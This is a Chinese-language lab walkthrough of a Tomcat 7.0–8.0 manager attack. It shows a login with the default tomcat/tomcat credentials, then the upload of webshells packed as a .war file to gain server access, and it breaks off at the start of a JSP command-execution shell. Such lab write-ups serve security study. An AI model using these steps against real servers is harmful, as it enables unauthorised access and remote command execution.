目录
0x01 漏洞介绍
- 漏洞描述
tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。登录成功后有上传点,上传压缩包 xxx.war的.war不会被解析,直接访问 xxx/目录下的木马,拿到权限 - 受影响版本
Tomcat版本:7.0–>8.0
0x02 环境部署:
搭建一次,复现百次
靶机 ip:192.168.30.209
kali ip:192.168.30.182
开启靶场环境
0x03 漏洞复现
1. 弱口令登录
从网上进行搜索tomcat原始登录名与密码都是tomcat,从github下载tomcat 8的源码,我们可以查看到tomcat的默认登录名为tomcat,并且密码也为tomcat
tomcat 8.0.x 源码
进行查看登录的用户名及密码
2. 点击Server Status进行登录
弱口令tomcat tomcat 直接登录成功
3. 发现文件上传点
上传的文件格式必须为war
4. 上传木马文件
4.1 将三个木马放进exec文件夹
4.2 将exec文件夹进行压缩为zip格式,手动将后缀zip修改为war
4.3 上传exec.war文件
上传成功
5. 方法一:执行命令
//这是jsp命令执行脚本,带回显
<%
if("666".